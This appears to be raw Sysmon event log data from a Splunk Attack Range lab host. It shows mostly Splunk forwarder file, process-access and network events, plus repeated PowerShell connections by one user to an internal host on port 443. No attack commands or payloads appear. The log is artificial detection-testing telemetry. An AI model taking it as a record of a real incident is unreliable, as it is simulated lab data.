AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56513-false10.0.1.12-8000- 23542300x800000000000000035083762Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:53.335{B81B27B7-4024-611D-7300-00000000C801}2188NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2BC728B7AD22BCE53248AD40BE88247,SHA256=B66540B14E1F20330B4FC9906714B8805FF7C764729374C230BB95F8D32D15E6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083765Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:54.749{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083764Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:54.365{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0363F2DD9FCF24909D5037F091F256A8,SHA256=0CFB0DF3E6172C3A3AC0E643F9CA324A9DFF30CB6212324FD25EC07261816A94,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083768Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:55.532{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E938FBDC995FD0674BFB87F3F170B325,SHA256=A356B67F9CD70AA02141DFBA5EE3684DC8CF2559492B4B04A7DC29B86EAA5E1C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
354300x800000000000000035083767Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:20.325{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56514-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083766Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:55.379{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A707860F37A2A2E6061B328D7A2015E4,SHA256=5F267C31250B4E39348A014BC9CE38C37898AEA379D10E35F31793B7BA6FA29D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083770Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:20.745{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56515-false10.0.1.12-8089- 23542300x800000000000000035083769Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:56.413{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DDB9115879A0F10476F6344C5465D93,SHA256=65755C45807B191544912DBC12CB8CE5B8A8CDAD4C434B0001AF7D235DCD97D7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083771Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:57.447{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B99E552A74CD65A7C3D0667EFAAD9456,SHA256=ACFCF1E7D32F4604D0B57E57A279E9D8B640050A60051565B1A9B07FBB24AF16,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083772Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:58.461{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=834F5F6486565AC505248384C7EE2FB3,SHA256=F3C45D0B28C325AC172C99A3B30C55BB8027D4D3153EE8345CD713DCE9FEBA9C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083776Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:24.342{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56517-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035083775Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:23.121{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56516-false10.0.1.12-8000- 23542300x800000000000000035083774Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:59.475{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DEC2794D47D312A3D106A3A78217AA5,SHA256=258EE595906F2D1AADA84F3937B6E7CDE6DC5B1524D9625B017F8D12341F03BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083773Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:59.344{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3EE3B7AC38EA63B7103FA08155D8F454,SHA256=209D2A3F0CD6826569A9FEA93CEDFF85D2189CFEB2DA0D20BFC3A7DC5598EDD4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083777Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:00.491{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C550B4BF1FC4423C63672A014A7808C,SHA256=FA1E79EFE0BC77876C89EC18F3BC9C99D9568F9A460231AAC78EC109A3DD94FF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083778Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:01.558{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE1C6FBCD66711538C75379E4F42AD0E,SHA256=0729959D9298462091393D478FD44FB2B962CF293FF6B71BDF82D3DB13DED4DF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000035083779Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:02.608{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F73E3AD44E3D52831A03DB406E220110,SHA256=D0C7B350CEB3C2D515E0E295F6E2F592F95E2260E5D9369F7BD39E7D9417FCE5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083781Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:03.641{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C08D7E38DD086630D5A0F5BBB3777C0,SHA256=3EA33E0D0FEED7DD31885D67383A05ED6CC27FB0069ACE4EA6115EC01A521806,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 13241300x800000000000000035083780Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:07:03.126{B81B27B7-4012-611D-1000-00000000C801}976C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7a5a5-0x7de8036a) 354300x800000000000000035083786Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:29.354{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56519-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035083785Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:29.068{B81B27B7-4012-611D-1000-00000000C801}976C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL 
18:07:28.328{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083845Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:28.328{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4D60-613A-2290-03000000C801}6576C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035083844Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:28.328{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4D60-613A-2290-03000000C801}6576C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035083843Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:28.313{B81B27B7-4D60-613A-2290-03000000C801}6576C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035083842Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:28.094{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37B1DB69BDD98FB189DFB8556CA4CE3D,SHA256=858E331FFFA0350939F35D10F59FA395ECEDD8449E267B4DFAA13F9E8670A13E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083861Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:07:29.411{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6060ED7C3298BD0A58EF4B3C3A44395A,SHA256=D547CBE51D956EAD01AFCF1B58BDFD172C73D6175A7E1EA22472CB6D5051D4BF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083860Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:29.111{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9A65B8BC6F91288296A20B76E6D046B,SHA256=9D4B45C04B3A474BBC448ED8AEC28F589CF0F1232CBD2B32D6F7390D032ADCC5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035083859Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:29.027{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4D61-613A-2390-03000000C801}5608C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083858Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:07:29.027{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083857Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:29.027{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083856Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:07:29.027{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083855Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:29.027{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083854Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:07:29.027{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4D61-613A-2390-03000000C801}5608C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035083853Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:29.027{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4D61-613A-2390-03000000C801}5608C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035083852Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:29.012{B81B27B7-4D61-613A-2390-03000000C801}5608C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035083863Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:30.491{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=949DE58F2D192594FF5DCBB6BDB0DA3A,SHA256=D91442144086EEB5A36C6E16C171BF9187E1CC2C0282971E2E4B00FB09AA460C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083862Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:30.126{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=057C4CB2F43B5FA970252BEF3C4ED914,SHA256=772B4CE408A88BEA7A10A59486E7B6B1FB0C3EF6D07C0E72C16C48A60B6D6C2D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083866Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:07:31.956{B81B27B7-2BC4-612D-7CF4-01000000C801}4056ATTACKRANGE\REED_SCHMIDTC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\reed_schmidt\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\4056.xml~RF717c7c37.TMPMD5=7FFA55FF6AC84742FC67B49B83BE3F12,SHA256=786CB96E30E42C16784374E9E5E14298976752E69CFAAF7FCB2ED016D9E3B6BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083865Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:55.425{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56528-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083864Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:31.156{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF2E7962325E9A53622C4DFE1B99E10C,SHA256=7E75C6D68CEA177A5A7286654EB4FF8DC79679EA5A4B8AE45D055E9F6D7BE09A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035083871Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:07:32.839{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1500-00000000C801}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083870Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 